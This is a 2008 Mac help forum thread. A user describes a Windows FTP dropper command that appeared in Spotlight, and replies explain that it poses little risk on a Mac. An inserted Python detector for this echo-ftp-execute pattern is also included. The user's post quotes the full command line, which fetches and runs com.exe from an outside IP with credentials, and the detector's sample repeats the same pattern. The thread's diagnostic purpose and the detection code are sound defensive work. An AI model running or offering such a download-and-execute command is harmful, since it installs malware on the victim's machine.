PNWDweller Posted November 25, 2008
Ok, so I am minding my own business and the browser freezes (mind you, was on Google.com), and Spotlight gets the following entered into it:

echo open 87.230.22.187/https/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exitecho You got owned

So, I know this is someone's lame attempt at a hack, but what gets me is how it has come into the system. I have the normal firewall rules on and no unusual processes running. I was running through my WPA2 protected WIFI connection, but have jumped to hard wired for now and disabled the network for now. I have not downloaded any questionable content from anywhere and stay updated. I went as far as to go in and install anti-virus on the Mac (even though some may consider it a moot point). Negative on the results. Of course, this sounds like a Windows virus. No other Windows systems were connected to the network at the time of this 'hack'. Any ideas? Google returns ZERO results.

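Added example, not part of the original thread or any poster's code: a detection sketch for the pattern in the command above, where one cmd.exe line builds an FTP script with echo, passes it to ftp -s:, and then runs a fetched file. The function name analyze and the sample lines (placeholder host 192.0.2.10 and made-up credentials) are constructed for illustration.

```python
import re

SEP = re.compile(r"\s*&+\s*")                      # cmd.exe command separator
ECHO_APPEND = re.compile(r"^echo\s+(?P<text>.*?)\s*>>\s*(?P<file>\S+)$", re.I)
FTP_SCRIPT = re.compile(r"^ftp(?:\.exe)?\b.*?\s-s:(?P<file>\S+)", re.I)
FTP_OPEN = re.compile(r"^open\s+(?P<host>\S+)", re.I)
FTP_GET = re.compile(r"^m?get\s+(?P<name>\S+)", re.I)


def analyze(cmdline):
    """Return details if one command line builds an FTP script with echo,
    feeds it to ftp -s:, and then runs a file it fetched; else None."""
    scripts = {}      # script name -> lines echoed into it
    used = None       # script actually passed to ftp -s:
    host, fetched, executed = None, [], []
    for part in SEP.split(cmdline.strip()):
        m = ECHO_APPEND.match(part)
        if m:
            scripts.setdefault(m["file"].lower(), []).append(m["text"])
            continue
        m = FTP_SCRIPT.match(part)
        if m and m["file"].lower() in scripts:
            used = m["file"].lower()
            for line in scripts[used]:
                o, g = FTP_OPEN.match(line), FTP_GET.match(line)
                if o:
                    host = o["host"]
                if g:
                    fetched.append(g["name"].lower())
            continue
        words = part.split()
        if used and words and words[0].lower() in fetched:
            executed.append(words[0].lower())
    if used is None or not executed:
        return None
    return {"script": used, "host": host, "fetched": fetched, "executed": executed}


# Constructed sample command lines (placeholder host and credentials).
DROPPER = ("echo open 192.0.2.10 21 >> ik &echo user demo demo-pass >> ik "
           "&echo binary >> ik &echo get com.exe >> ik &echo bye >> ik "
           "&ftp -n -v -s:ik &del ik &com.exe &exit")
BENIGN = [r"ftp -s:C:\jobs\nightly.txt", "echo done >> build.log & dir"]

if __name__ == "__main__":
    print(analyze(DROPPER))
    print([analyze(c) for c in BENIGN])
```
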
LTD Posted November 25, 2008
get com.exe
It appears to be Windows related. But the manner in which it appeared to you is really odd.

giga (Veteran) Posted November 25, 2008
Seems like the hacker is pretty stupid since Spotlight won't even execute that command heh. Not to mention that it was a Windows executable which can't really do much on your machine.

LTD Posted November 25, 2008
Seems you're ok. No harm done. Carry on. ;)

Mercellus Posted November 25, 2008
Normally something like a JavaScript could possibly execute this in the background on a Windows machine to take advantage of it... on Mac OS X, not so much. Just double-check your applications, make sure you don't have anything odd installed. If you are really concerned, make a new user account, which should isolate it further.

MasterC Posted November 25, 2008
What browser? I'm going to take a guess and say Firefox, since it was a Windows based attack.

PNWDweller (Author) Posted November 25, 2008
Firefox it was. But I don't see how that could have made much of a difference. Anyway, I have since rebooted the machine due to a Safari Update Apple sent out to my system so hopefully if there was a "resident" program in line, then it would have terminated. I knew the .exe was a Windows executable, so I wasn't worried about that, except perhaps that the CodeWeavers CrossOver program is installed.